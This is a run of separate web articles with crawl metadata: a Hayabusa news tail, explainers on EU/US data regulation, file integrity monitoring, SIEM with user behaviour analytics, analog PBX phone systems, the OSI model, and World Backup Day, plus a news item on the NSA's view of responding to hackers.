Its seven-year mission ended in 2010 when it blazed a trail over Australia before slamming into the desert.
Success with Hayabusa 2 would help Japan’s space program move beyond a chequered past that included a 2016 accident in which the first of three planned military communication satellites was crushed during a flight from Japan to Europe’s space port in French Guiana.
The first such satellite eventually blasted successfully into space in January 2017.
(Reporting by Elaine Lies; Editing by Darren Schuettler) | <urn:uuid:4f3ca00a-9231-475c-b4f1-0b9cc3325624> | CC-MAIN-2022-40 | https://disruptive.asia/japanese-hayabusa-asteroid/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00315.warc.gz | en | 0.952162 | 474 | 2.953125 | 3 |
The United States was once the leader in creating rules curtailing fraud on stock exchanges. One of its most famous rules, Rule 10-b5 codified at 17 CFR 240.10b-5, was created in the 1940s and prohibits acts or omissions resulting in fraud or deceit in connection with securities trading.
Like many laws, it was imitated on a global scale, but it took almost 60 years before it was adopted in such trusted exchanges as Hong Kong and Tokyo. Nowadays things move a bit faster.
The European Union’s GDPR (General Data Protection Regulation) became law on May 25, 2018. Today, less than 4 years later, there are similar laws in more than 20 countries.
The reason is simple. Article 44 of the Regulation states that if a third country wants to use EU residents’ personal data, it must protect their rights. To do this, its data protection laws have to be “adequate.” Most countries quickly figured out that to be “adequate,” you passed a law that looks a lot like the GDPR. The exception is the U.S.
Global regulation of personal data processing has not stopped with the GDPR. In the EU and the U.S., legislatures are busy passing new laws that regulate how organizations process information, and regulators are busy enforcing them.
The European Commission has passed, is close to passing, or is considering several laws as part of its digital strategy. These include the Data Governance Act, the Digital Markets Act, the Digital Services Act, the AI (Artificial Intelligence) Act, the Data Act, and the ever-popular ePrivacy Regulation.
Fortunately, the biggest impact of these laws will be limited to the largest tech companies, including Google, Microsoft, Facebook (Meta), Apple, and Amazon. In terms of regulating these organizations, the U.S. is not far behind, although without a strategy.
Data governance and digital markets
The following is a simplification of the complex laws. The Data Governance Act is about the sharing of information. It seems to be focused on public information, most likely from EU national health services. No doubt the Act will result in more anonymization of data.
The Digital Markets Act is focused on “gatekeepers” (U.S. big tech), providing more regulation of big tech almost as an anti-trust problem. Little is known about the Data Act or AI Act because there are no concrete proposals at this time. For most of us, the Digital Services Act is probably the most interesting since it has analogs in U.S. Congress.
The Digital Services Act focuses on one of the largest problems for social media: algorithms –specifically their impact. The Act aims to stop the largest platforms from publishing and spreading illegal or potentially harmful content such as copyright infringements, terrorist content, child sexual abuse material, or hate speech, as well as selling counterfeit, illegal, or dangerous products.
Under section 230 of the Communications Decency Act of 1996 (47 U.S. Code § 230), large Internet platforms are not liable for speech published on their platforms.
Unlike other media outlets such as newspapers and television, companies like Google and Facebook cannot be sued if the content on their platforms causes harm. This has become a major issue, especially in light of recent evidence that social media apps like TikTok have caused harm to teenage users. The platforms have also been used to organize criminal activities.
The Filter Bubble Transparency Act
Given the problems with section 230, it is not surprising that there have been numerous efforts to either delete the provision or reform it. One of the latest efforts is the Filter Bubble Transparency Act. Focused on algorithms, it allows Internet users to choose between the platform algorithms and an algorithm developed with the user’s input.
The largest impact of the Digital Services Act in the EU and the Filter Bubble Transparency Act in the U.S. would be more transparent algorithms. Both laws reflect governmental preferences.
In the EU, regulators determine whether the algorithm promotes illegal content. In the U.S., the user will determine what they want to see. Neither act has cleared all hurdles to becoming law, although the Digital Services Act is closer.
The Filter Bubble Transparency Act has been introduced in both chambers of U.S. Congress. It has a long list of cosponsors and is bipartisan. The latest polls show that the majority of Americans (56% and rising) are in favor of government regulation of big tech.
It is not just legislative efforts. While the EU attempts to limit the power of “gatekeepers” with the Digital Markets Act, U.S. regulators have turned to the courts. Most complaints are based on big tech anti-competitive behavior. The Federal Trade Commission is suing Facebook and Amazon. The U.S. Justice Department is suing Apple and Google.
Finally, 38 states have joined forces to sue Google. These lawsuits deal with the way these companies compete in app stores, in marketplaces, on the Internet of Things, and online. Like the Digital Markets Act, these lawsuits will force big tech to change their behavior or be broken up.
What effect do these laws have?
Fortunately, for most companies these laws will have little impact. The Digital Markets Act and the Digital Services Act only apply to platforms that have active users equal to 10% of the EU population (about 45 million people). The Data Governance Act is mainly interested in access to public information.
This does not mean that companies that process personal data (basically all companies) should be complacent. It always takes the law time to catch up with major changes in technology. When it does, it can regulate with a vengeance everywhere. The jurisdiction of these laws is limited for now. Do not expect that to continue.
Furthermore, not being big enough to be subject to regulation does not mean that an organization is small enough to avoid cyber criminals. The best tactic, whatever your size, is to create good cybersecurity that protects your customers’ information.
At IT Governance USA, we can help you do this. We are a one-stop shop for your cybersecurity and data protection needs, offering a variety of tools you can use to bolster your defences and maintain regulatory compliance.
Subscribe to our Weekly Round-up to get the latest cybersecurity news and tips delivered straight to your inbox. | <urn:uuid:7018735d-7c9b-4178-ad45-b000784855df> | CC-MAIN-2022-40 | https://www.itgovernanceusa.com/blog/understanding-the-u-s-s-data-service-laws | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00315.warc.gz | en | 0.953587 | 1,303 | 2.78125 | 3 |
What is File Integrity Monitoring (FIM)?
The term FIM refers to IT security technologies and processes used to check whether certain components were corrupted or tampered with. You can use FIM to inspect operating systems (OS), databases, and application software files.
A FIM solution establishes a trusted, known baseline for each file, and performs audits of all changes to files, by comparing them to this baseline. If it determines that a file has been tampered with, updated, or corrupted, it generates an alert to enable further investigation and action.
You can use FIM in two ways:
- Active monitoring—live monitoring of changes to files based on rules or behavioral analysis
- Reactive auditing—forensic examination of files after security incidents
How File Security Enables File Integrity Monitoring
File Integrity Monitoring solutions rely on file security features built into modern operating systems and databases.
Windows file security
In Windows, files are securable objects. Access is managed by the same access control model that manages all other securable Windows objects.
Windows compares the permissions and information requested by the thread access token with the information in the security descriptor of the file or directory. If there is a match, a handle is returned to the thread and authorization is granted.
Linux file security
The Linux security model is based on the robust security model used by UNIX systems. In Linux, there are three categories of users: owner, group, and other users. The owner can grant or deny read, write, and execute permissions for each user category.
Linux returns one of four access codes when access is requested to a file:
- 0—access not granted to the user category
- 4—read access only granted to the user category
- 2—write access granted to the user category
- 1—execute permission granted to the user category
Database file security
All modern databases have built-in file security features. For example, an Oracle database has the same user categories as Linux—owner, group, and other users. Only the owner of the file or root can assign or modify file permissions. Permissions include read, write, execute, and denied—meaning users do not have any access to the file.
Why is File Integrity Monitoring Important?
File integrity monitoring software tracks, analyzes, and reports about unexpected changes to critical files in your IT environment. It can support incident response while providing an important layer of file security for data stores and applications. The four main use cases for monitoring file integrity are:
- Detecting malicious activity—when security breaches occur, it is important to know whether they have attempted to modify important files in operating systems or applications on your IT systems. Even if log files and other detection systems are bypassed or changed, FIM can detect changes to key parts of the IT ecosystem.
- Identifying accidental changes—it is quite common for an employee or other authorized party to accidentally modify or delete a file. In some cases, a change can hurt the stability of a system, create a security backdoor, or result in loss or corruption of sensitive data. Monitoring file integrity simplifies forensic investigations by showing what happened, where, and by whom.
- Verifying updates and system integrity—IT systems are often updated. You can use FIM solutions to run scans on multiple systems that had the same patch applied, to ensure that they are all updated correctly, by comparing their file checksum. Similarly, you can scan multiple systems using the same OS or software, to ensure all systems are running a consistent version of the software.
- Compliance—standards like SOX, HIPAA, and PCI DSS mandate that an organization should monitor and report on changes to files. See the regulations that require FIM in the section below.
How File Integrity Monitoring Software Works
File integrity monitoring solutions typically have four key components:
- Database—stores information about the original state and settings of files in an encrypted hash format.
- Agents—deployed on computers FIM needs to monitor, collect data from hardware and applications and store it in the database
- Analysis engine—FIM systems analyze file data to identify important changes, based on static rules and/or behavioral analysis based on machine learning algorithms
- User interface—a user interface that enables FIM administrators to access reports, actively search for file changes, and configure alerts.
5 Steps to Implementing a File Integrity Monitoring Solution
You can follow the process below to prepare your organization for a FIM solution, and implement it effectively.
1. Defining a policy
A FIM strategy begins with policies. In this step, the company determines which files it needs to monitor, what kinds of changes can have an impact, and who should be notified and take action.
2. Setting baselines for files
Based on the policies, a FIM solution scans the relevant files across the organization and sets a baseline of “known good” files. Some compliance standards require this baseline to be documented in a way that can be presented to an auditor.
The baseline typically includes the version, creation/modification date, a checksum, and other information that IT experts can use to verify that the file is valid.
Once the baseline is recorded across all relevant files, FIM can continuously monitor all files for changes. Because files are often changed legitimately, FIM can generate a large number of false positives—alerting about a change to a file even though it is not malicious or impactful.
A FIM system can use several strategies to avoid false positives. Administrators can define (in advance or after receiving a false positive alert) rules indicating which types of changes are expected or allowed. A FIM system can also use behavioral analysis to determine if the change is “normal” or constitutes an “anomaly” that needs to be investigated.
4. Sending alerts
When a file integrity monitoring solution detects significant, unauthorized changes, a file security alert should be sent to the teams or individuals who are responsible for that data or system, and are responsible for investigating the problem. FIMs may send alerts to IT staff, database or file server administrators, or security teams.
5. Reporting results
A FIM generates period reports showing file activity and changes in the organization. These reports might be used internally by security or IT staff. Or they can be delivered to auditors for compliance purposes (see the following section).
Compliance Standards that Require File Integrity Checks
FIM solutions are commonly used to comply with regulations or compliance standards. Below are the file security requirements of several common compliance standards with regard to file security.
The Payment Card Industry Data Security Standard (PCI DSS) regulates the security activities of organizations involved in processing payment cards. There are two parts of the PCI standard that specifically describe the requirements for file integrity monitoring:
- 10.5.5—use file integrity monitoring or change detection software to ensure any change to log data triggers an alert
- 11.5—implement change detection monitoring to compare critical system, content or configuration files, and generate alerts about any unauthorized changes.
The Sarbanes Oxley Act (SOX) is a federal law that establishes accountability requirements for the board of directors of US publicly traded companies, their management and their accounting firms.
SOX does not specify the specific methods an organization should use to meet its requirements. Most organizations rely on the COBIT framework for regulatory compliance. COBIT has 34 control objectives organized into four groups. Here are the groups and specific objectives relevant for file integrity monitoring:
“Build, Acquire and Implement (BAI)
- BAI06—Manage Changes
- BAI09—Manage Assets
- BAI10—Manage Configuration
Deliver, Service and Support (DSS)
- DSS03—Manage Problems
- DSS04—Manage Continuity
- DSS06—Manage Business Process Controls
Monitor, Evaluate and Assess (MEA)
- MEA01—Monitor, Evaluate and Assess Performance and Conformance
- MEA02—Monitor, Evaluate and Assess Internal Control”
The General Data Protection Regulation (GDPR) applies to all companies that process personal data of EU data subjects. You can use FIM to meet the following GDPR requirements:
- Article 25—data protection by design and data protection by default
- Article 32—security for data processing
- Article 39—duties of the Data Protection Officer (DPO)
- Article 57—tasks performed by supervisory authority (including audits and complaints)
- Article 59—activity reports
The Health Insurance Portability and Accountability Act of 1996 (HIPAA) includes safeguards to ensure the integrity, availability, and confidentiality of protected medical information.
The HIPAA Security Rule refers to five technical controls that may be related to file security: introduction, authentication, protection, technical safeguards, and data integrity protection.
In addition, according to NIST Special Publication 800-66, a FIM solution can help achieve the requirement for “continuous evaluation of access controls and data security”, which is specified in HIPAA best practices.
File Security with Imperva
Organizations that leverage file integrity monitoring to protect their sensitive data are in need of a holistic security solution. Even with FIM technology in place, infrastructure and data sources like databases need to be protected from increasingly sophisticated attacks.
Imperva protects data stores to ensure compliance and preserve the agility and cost benefits you get from your cloud investments:
Cloud Data Security – Simplify securing your cloud databases to catch up and keep up with DevOps. Imperva’s solution enables cloud-managed services users to rapidly gain visibility and control of cloud data.
Database Security – Imperva delivers analytics, protection and response across your data assets, on-premise and in the cloud – giving you the risk visibility to prevent data breaches and avoid compliance incidents. Integrate with any database to gain instant visibility, implement universal policies, and speed time to value.
Data Risk Analysis – Automate the detection of non-compliant, risky, or malicious data access behavior across all of your databases enterprise-wide to accelerate remediation. | <urn:uuid:75478cfc-0de9-4a5c-9610-996b4b3a5630> | CC-MAIN-2022-40 | https://www.imperva.com/learn/application-security/file-security-integrity-monitoring/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00515.warc.gz | en | 0.893846 | 2,115 | 3.015625 | 3 |
The US is considering responding to hackers through the use of conventional weapons, according to the director of the National Security Agency (NSA).
Michael Rogers, who also heads US Cyber Command, told a forum in Washington DC that the American military was contemplating several options as it prepares for the rising risks of cyber.
Speaking at George Washington University, he said: "Because an opponent comes at us in the cyber-domain doesn’t mean we have to respond in the cyber domain.
"We think it’s important that potential adversaries out there know that this is part of our strategy."
Following last year’s attack on Sony Pictures Entertainment, the film subsidiary of the Japanese electronics conglomerate, the US arranged economic sanctions against North Korea, which it blamed for the hack.
According to the newswire Agence France-Presse, Rogers cited this as an example of non-cyber responses to online violence, and did not rule out physical weapons as another tool that could be used.
"It’s situational dependent," he said. "What you would recommend in one scenario is not what you would recommend in another."
Tensions between the US and its global rivals Russia and China have increased over the past few years, with both the latter countries accused of funding cyberattacks against Western companies and citizens.
The low costs of entry for cyber-weapons has also meant that poor countries like North Korea can fight on more equal terms with superpowers, whilst difficulty attributing attacks makes military deterrence more complicated.
Despite its complaints the US is widely believed to have developed the most potent cyber-weapon in history in the form of Stuxnet, a virus that attacked Iranian nuclear infrastructure over several years. | <urn:uuid:1468dc67-f054-4a71-8bf0-c809b481ebd6> | CC-MAIN-2022-40 | https://techmonitor.ai/technology/hardware/us-ponders-use-of-real-weapons-to-beat-hackers-4574717 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00515.warc.gz | en | 0.965713 | 347 | 2.515625 | 3 |
Hackers come in many forms. They could be a single person acting alone or an organised group of individuals with nefarious intent. With so many possible origin points and numerous varieties of attacks it can be very difficult to prevent them all, let alone figure out where they are coming from and who is perpetrating them.
Owing to how complicated investigating and solving these incidents can be, sometimes it is easier to think about the attack itself and defend against it, rather than try to stop every single attack. This might work in the short-term, but longer-term this approach does not guarantee that the attacker will not be back again. To make matters worse, the attacker might be closer than you realise.
Insider threats are a recurring problem for enterprise security as those with malicious intent are given direct access to the network infrastructure. Often, an insider threat is a disgruntled employee or ex-employee who still has access to your systems, or they could be a spy working for a third party to steal confidential and sensitive information.
The most dangerous insider threats are the employees who are not even aware they are the cause of the problem. Due to ignorance or carelessness, the accidental threat looms large whereby employees may have allowed harmful malware onto the system unintentionally. It is a very complicated process to identify an insider threat, and this has led to some businesses adopting a ‘zero trust’ policy. This is a model based on the principle of maintaining strict access controls and not trusting anyone by default, especially individuals already inside the network perimeter.
There is technology designed to help fight against insider threats and the most commonly used are aptly called Security Information and Event Management (SIEM) tools. SIEM tracks and collects system events captured in firewalls, workstations, network appliances and more, it then collates them all into one database for easy viewing. This data can then be analysed for any anomalous events captured and an alert sent to the security team, allowing them to take instant action to remedy the situation.
With a growing number of devices connected to the enterprise network, the number of records the SIEM tool must monitor and analyse is growing. To solve this problem the device administrator creates a profile of the system during peace time. Then the SIEM is pre-configured with rules that help to identify when something unusual has happened and so when to trigger an alert. That way only what is seen as unusual gets flagged and the normal traffic is ignored. For general cyber security this works well and this is the reason why SIEM tools are so widely adopted. However, when pin-pointing the origin of an insider threat the information is simply too broad.
SIEM can track anomalies across an entire network and flag up dangerous events to the security teams, however it is always reactionary and cannot supply intelligence around the individuals who may have caused the event. This data is vital for countering insider threats as the key to defending against it is identifying the individuals involved. SIEM tools by themselves cannot stop insider threats, but there are tools that can support SIEMs to improve on this, these are called User Behaviour Analytics (UBA) tools.
UBA tools function in a very similar way to SIEMs. A baseline is laid out identifying what is normal and what is abnormal and then the UBA scans for events that fall into the latter category. The difference is that, as the name implies, UBA looks at the actions of individual users in the internal enterprise network as opposed to the whole infrastructure. The UBA can quickly identify user deviations from what is considered the norm and generate an alert. Utilising this method, the source of the attack can be identified instead of just the attack itself, helping develop a definite solution to stop the root cause.
UBA can spot changes in the activity of employees that signal insider data theft or IT sabotage. It can also tell whether an employee’s credentials are being used by outsiders by identifying whether the access is coming from within the internal network or from the outside. UBA gives a greater level of visibility and intelligence that SIEMs cannot provide on their own. It provides organisations with multiple ways in which statistics can be analysed and offers both numerical and categorical data. This allows security professionals to prevent insider attacks before they happen, making UBA proactive instead of responsive.
An important fact to note is that UBA tools cannot work on a standalone basis. UBA is a complement to SIEMs and so both must be implemented for the greatest level of defence and intelligence. Utilising a combination of both SIEM and UBA allows for maximum visibility of the full network and the individual users on that network. This allows security teams to keep the organisation safe from outside threats while simultaneously preventing inside threats from launching a surprise attack. The ultimate in cyber defence.
SIEM is a valuable cyber security tool. It provides wide visibility across the network but requires the precise intelligence on the individual users that UBA offers. Insider threats are rising in prominence as a cyber security threat and SIEM alone simply cannot supply enough data to fight against it and can only react when the attack has already occurred. To be proactive in preventing and identifying insider threats UBA needs to be adopted alongside SIEM so that both can be used in tandem to protect the business from both outsider and insider threats.
Interested in hearing industry leaders discuss subjects like this and sharing their use-cases? Attend the co-located IoT Tech Expo, Blockchain Expo, AI & Big Data Expo and Cyber Security & Cloud Expo World Series with upcoming events in Silicon Valley, London and Amsterdam and explore the future of enterprise technology. | <urn:uuid:d593c5fc-4de7-42ee-b269-ed9ea1c9d5b5> | CC-MAIN-2022-40 | https://www.enterprise-cio.com/news/2019/feb/28/why-siem-alone-not-able-stop-insider-threats/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00515.warc.gz | en | 0.949338 | 1,137 | 2.625 | 3 |
Traditional Analog PBX Phone Systems: How Do They Work?
A private branch exchange (PBX) is an office telephone system installed inside a company that connects users through local phone lines. It’s a telephone system that routes calls between users through local networks while allowing everyone to share a limited number of external phones.
Originally, private branch exchanges were equipped with analog technology. Today’s PBXs are based on digital technology, with digital signals being transformed to analog for outgoing calls on the local loop, made possible by utilizing Plain Old Telephone Service (POTS) lines. Network switching systems are built into PBXs, which allows them to be connected to an enterprise’s digital PBX system if this is desired.
Let us look at how PBX phones and POTS function, their main purpose, and how they work.
What Is An Analog PBX Phone System?
PBX (private branch exchange) is a switching mechanism that links the phones and extensions inside a firm to one another as well as to external analog lines. Using this method, a large number of employees can share a limited number of external phone lines, potentially reducing costs.
An analog PBX system employs regular Plain Old Telephone Service (POTS) phones and copper wire for communication. They are dependable, provide excellent speech quality, and have all of the essential capabilities of a traditional house phone (such as hold, mute, redial, and speed dial), as well as the ability to transfer calls across extensions. They are also inexpensive.
An analog PBX system maintains operational extensions even if the power goes off, and users will continue to be able to communicate. They are generally inexpensive since they are straightforward and offer few choices for expansion or improvement.
On the other hand, they are more costly to maintain, set up, and update since they are less modular. To relocate an extension, for example, requires the rewiring of the punchboard by a qualified technician board.
Analog phone systems are associated with traditional landline telephone services. They link phones by sending speech signals over copper cables and via a series of physical switches to establish a connection between them.
Businesses that are still employing analog phone technology have often had their system in place for a long time. It is also common to see a Private Branch Exchange (PBX) system in operation in the majority of scenarios.
Read up on the parts of call flow here!
How Do Analog PBX Phone Systems Work?
The complexity of the system dictates the type of system that is used, whether it is a traditional PBX to which copper telephone landlines are connected, whether it allows a mix of analog and digital lines, whether it uses voice over IP (VoIP) hosted at the organization, or whether it is a cloud-based PBX system, among other things. Each of these is covered in further depth lower down the page.
Office telephones that use an analog PBX system rely on landline copper-based telephone lines that enter a business’s premises and are linked to a central office PBX box.
These switch boxes are made up of telephony switches that allow calls to be distributed to different phones throughout an office while also allowing those phones to communicate with a limited number of outside lines, known as trunk lines, at the same time.
An IP PBX, also known as an Internet Protocol PBX, is an office telephone system that sends calls using digital phone signals rather than traditional landlines.
Because Ethernet cables may be used to link phones instead of traditional phone lines, there is no need to rewire the system. IT management service providers may also host IP PBX systems, which makes them more accessible.
Hosted systems demand monthly payments even though there are fewer hardware expenditures connected with their utilization on the part of the end customer.
Smaller PBX systems, often known as virtual PBXs, provide hosted services but have fewer functions than larger PBX systems.
Landline phones and analog phones are identical terms. A PBX for landlines is used to connect calls between phones by transmitting voice signals over copper cables and then through a series of physical switches.
Businesses that still use analog phone technology have often had their system in place for many years. These businesses also often rely on Private Branch Exchange technology to communicate.
See the reasons why call flow is important here.
Modern PBX Systems
Modern PBXs are equipped with a variety of management capabilities that make communication inside enterprises easier and more effective, hence increasing productivity.
Size and complexity vary, from large-scale corporate communication systems costing thousands of dollars and requiring extensive training to simple plans that may be hosted in the cloud for a small monthly price. The most basic functions of simple home-based PBX systems are available as an update to existing conventional phone lines.
Although the functions of a PBX might be complicated, the following are the most important ones:
- In an organization, the use of more than one telephone line is permitted.
- Telephone call management, including incoming and outgoing.
- One phone line is divided into many internal lines, which are designated by three- or four-digit numbers called extensions, and calls are transferred to the internal line that is most suited for the caller.
- Internal phone interactions are handled by the IT department.
- VoIP (Voice over Internet Protocol) calling, which offers a variety of advantages and upgrades over the traditional telephone, the most notable of which is the cost savings, is becoming more popular.
- Call recording, voicemail, and interactive voice response (IVR) systems provide a high-quality user interaction (interactive voice response).
- Automated replies, which automatically lead consumers to the most relevant lines using voice menus, are becoming more popular.
Main Purpose Of PBX System
A telephone switch station (PBX) is a device that enables users to make and receive phone calls across a telephone network. In its most basic form, it is comprised primarily of numerous office phone system branches, and it transfers connections to and from them, thus connecting phone lines.
A PBX is a device that allows businesses to connect all of their internal phones to a single external line. This allows them to lease just one phone line and have several individuals use it, with each person having a phone at the desk with each phone having a unique number.
However, since it is based on the internal numbering system, the number does not have the same structure as a phone call. With a telephone system, it is only necessary to dial three-digit or four-digit numbers to connect with another phone on the network when using a private branch exchange (PBX).
Find out more about Automatic Call Distribution (ACD): What is it? How Does it Work?
A PBX system makes it simple and economical for businesses to utilize more than one phone line at the same time. A PBX, which manages both incoming and outgoing calls, makes it possible to divide a single phone line into numerous private lines, each of which is identifiable by an extension (usually assigned 3 or 4-digit numbers).
Not only does this make it simple for customers to contact everyone in an office by dialing a single phone number, but it also allows the group to communicate internally without the need for many separate phone lines, which saves money. VoIP communication is enabled by PBX systems as well.
Learn more about how VoLTE works here!
Functions of PBX Systems
PBX systems are responsible for four primary call processing tasks:
- Connect the phone sets of two users by dialing their extension numbers.
- Maintain connections for as long as the users need them to be maintained.
- Disconnect a connection based on the demands of the user.
- Provide information to the company for it to perform accounting and analytics functions.
Although it is realistic to assume that all PBX systems provide the capabilities outlined above, the vast majority of contemporary PBX systems additionally include a profusion of additional calling tools and capabilities (though each PBX may differ in which features they offer).
Some of the most often offered PBX functions are as follows:
- Call management is accomplished by the use of call blocking, call forwarding, call logging, call transfer, and call waiting for services.
- Customers’ experiences are enhanced as a result of call recording, voicemail, IVR (Interactive Voice Response), and Direct Inward Dialing (DID) technology (Direct Inward Dialing). Custom greetings, welcome messages, and holding music are some of the additional customer-facing features that are often offered with a PBX system.
- During business hours, conference calls and internal extensions are used to communicate among employees and departments.
- Local connections enable customers to have local phone numbers in locations where they are not physically present, allowing them to operate ‘virtual offices’ from anywhere in the world.
Discover the Automated Answering Services: How Do They Work?
Large corporations must have PBX office phone systems to properly organize their telecommunications infrastructure. PBX infrastructure may be beneficial to small and mid-sized firms, but hosted solutions, rather than pricey on-premise systems, will often provide higher value to these organizations in the long run.
When a company relies on incoming or outgoing phone calls, moving to a PBX office phone system will result in quick and noticeable advantages. Digital PBX systems are great assets for businesses that rely on telephone-centric business operations because of their enhanced functionality and cheaper telephone expenses.
Companies wishing to incorporate comprehensive telephone customer service capabilities will need to do so via the use of a private branch exchange (PBX). It is important to have a system in place for efficiently routing calls during peak times so that consumers have an enjoyable customer service experience while also ensuring that internal calls are dealt with separately.
Hosting PBX options for small organizations need little to no upfront cost and managed suppliers provide a wide choice of customizable plans that are based on real service consumption. This technology is appealing to practically any company because of its ability to deliver enterprise-level telecommunications solutions in a scalable way. | <urn:uuid:df046c15-9f2d-4395-ab86-78997984096c> | CC-MAIN-2022-40 | https://callflowsolution.com/analog-pbx-system/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00515.warc.gz | en | 0.947169 | 2,084 | 2.75 | 3 |
Networking Basics: What is the OSI Model?
The Quick Definition: The Open Systems Interconnection model (OSI model) is a conceptual model that characterizes and standardizes the communication functions of a telecommunication or computing system without regard to its underlying internal structure and technology. The seven layers are: Physical, Data Link, Network, Transport, Session, Presentation, and Application.
Why you should learn the OSI model
If you poke around the subject of the OSI model, you'll find varying opinions. Some argue that it's outdated because it doesn't fit current networking protocols. Besides, the OSI model is theoretical, right?
But hear us out. If you're studying for CompTIA Network+ or Cisco CCENT certification, you'll likely be tested on the OSI model. In the IT field, you'll hear vendors pitch their products by discussing which layers work with each project.
The bottom line is familiarity with the OSI model enables you to understand how protocols, devices, and applications interact with each other. This is especially handy when new technologies hit the market and pique your organization's interest.
OK, now it's time to take a look at each of the seven layers of the OSI model.
Layer 1: Physical
This layer is the physical representation of a network. It includes everything from cable types to pins. When there's a network issue, the first thing IT pros usually check would be physical layer elements such as the power plug or the network cables.
Layer 2: Data Link
Switches and hubs operate at this layer within most networks. Node-to-node data transfer and Kill connection (from the physical layer) is handled at Layer 2. It's also worth noting that at Layer 2 two sublayers exist: the media access control (MAC) and logical link control (LLC) layers.
Layer 3: Network
Now we're getting to the good stuff! Layer 3 is the crux of router functionality. Packet forwarding and routing happens at this layer. Let's say you're based in Washington DC and need to connect to a server in Seattle. There are millions of paths to choose from — and routers at the Layer 3 level make this process quick and successful.
Layer 4: Transport
How much data needs to be sent? At what rate does it need to be sent? Where is it going? How is the traffic segmented for efficient delivery and put it back together? There's a lot that needs to be considered when it comes to data transfer. Fortunately, Layer 4 handles the data coordination between hosts and systems.
You'll encounter the Transmission Control Protocol, commonly referred to as TCP, at the Transport Layer. This protocol is is built on top of the Internet Protocol (IP), which is known as TCP/IP. TCP port numbers work at Layer 4, while IP address work at Layer 3, the Network Level.
Layer 5: Session
You're likely familiar with the ol' saying, "It takes two to tango." Well, in the world of networking, it takes a session for two devices to communicate with each other. It's at this level that session setup, how long systems should wait for responses, and terminations between applications at the end of sessions occur.
Layer 6: Presentation
At some point, data has to be translated from networking format to application format or vice versa. So, think of this layer as "presenting" data to application or network. A prime example of this would be the encryption and decryption of data for secure transmission. This all happens at the Layer 6 level.
Layer 7: Application
We've finally reached the only layer non-IT folks care about: Layer 7. End users directly interact with applications that work at the Layer 7 level. We all use web browsers like Chrome or Firefox, which are Layer 7 applications. And speaking of apps, any of them like Microsoft Office or ESPN also are Layer 7 apps.
OSI Model in the Real World
While conceptual in nature, the OSI model can come in handy on the job.
If there's an issue with a network, having a visual map of what's occurring can help IT pros narrow down the problem. For example, is it a physical layer or an application layer issue? Another example of the OSI model being helpful is within the programming realm. To create a successful app, programmers should know what layers will interact with their apps.
For more about the OSI model, here's what CBT Nuggets trainer Keith Barker has to say: | <urn:uuid:c3c7dba4-6dd4-4a53-9cad-fdc51966597d> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/technology/programming/networking-basics-what-is-the-osi-model | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00515.warc.gz | en | 0.934328 | 933 | 3.921875 | 4 |
One might not think “aircraft” when picturing the U.S. Navy, but the military branch actually has thousands of aircraft currently in service – and now, supercomputing will help future naval aircraft operate faster, safer and more efficiently. Thanks to a $541,167 grant from the Office of Naval Research (ONR), researchers at Penn State will use the university’s Roar supercomputer to examine the effects of turbulence on aircraft in more unconventional situations.
Specifically, the research will focus on freestream turbulence. When an aircraft flies, “tip vortices” can form along the edges of its wings or engines. Normally, these tip vortices are predictable; however, in less normal situations (like taking flight over rough seas), they can become unpredictable and dangerous. Current naval aircraft designs hedge their bets with safer designs to account for these unknowns.
“As the Navy is trying to create more aggressive designs, they want to push the envelope to get every ounce of performance they can,” said David Williams, principal investigator for the research and an assistant professor of mechanical engineering at Penn State, in an interview with Penn State’s Erin Cassidy Hendrick. “As those engineers are trying to improve airplane wings, inlets or turbomachinery applications, we want them to have a clearer understanding of what the effects of freestream turbulence could be.”
The research project will consist of both a computational component and a physical component. The computational experiments will utilize Penn State’s Roar supercomputer, hosted by its Institute for Computational Data Sciences (ICDS). According to the ICDS, Roar contains “over 1000 servers with more than 23,000 processing cores, 6 petabytes of disk parallel file storage, 12 petabytes of tape archive storage, high-speed Ethernet and InfiniBand interconnects and a large software stack.”
“When a lot of the current helicopters and airplanes were designed in the 80s or 90s, the computational power was lower,” Williams said. “In the modern era, using Roar and some Department of Defense supercomputers, we can go after some problems in a way that just couldn’t be done before.”
Using Roar, the researchers will simulate the “entire range” of freestream turbulence flows, then validate the resulting models using a wind tunnel in Penn State’s Experimental and computational Convection Laboratory.
“In addition to enabling safer operation, we want the Navy to be able to push the envelope a lot further,” Stephen Lynch, who is also a principal investigator for the research and an assistant professor of mechanical engineering at Penn State. “If we find where the boundary exists on these conservative designs and show you can go up to this exact point, we can increase performance and maintain safety.”
To read the reporting from Penn State’s Erin Cassidy Hendrick, click here. | <urn:uuid:1c946fa6-477f-4795-b4f0-1eb63280725c> | CC-MAIN-2022-40 | https://www.hpcwire.com/2021/01/14/roar-supercomputer-to-support-naval-aircraft-research/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00515.warc.gz | en | 0.932343 | 617 | 3.296875 | 3 |
You may not have known this, but Thursday March 31st is World Backup Day. It is a global occasion dedicated to raising awareness around just how reliant we have become on data, why it’s important for big organizations and private individuals alike to backup, and how to best protect our data. This short guide introduces you to the key types of data backup, why they’re important, and why backing up should become part of your daily routine.
Why are backups important?
As much as we try, it’s almost impossible to mitigate against all potential accidents or vulnerabilities to malicious cyberattacks. Backups are a fundamental element of disaster preparation, ensuring that you’re fully prepared against data loss or theft. Backups give users invaluable peace of mind (you don’t have to worry about losing sentimental, private, or personal data) and also ensure that your potential downtime is as short as possible.
Though data loss, theft and compromise is prevalent, it might come as a surprise that 21% of people have never made a backup. This is the problem that World Backup Day is trying to address.
Different types of backup
‘Backing up’ your computer or device can take different forms. There’s no ‘right’ way to backup your data, instead the best backup method for you depends on your user profile and needs.
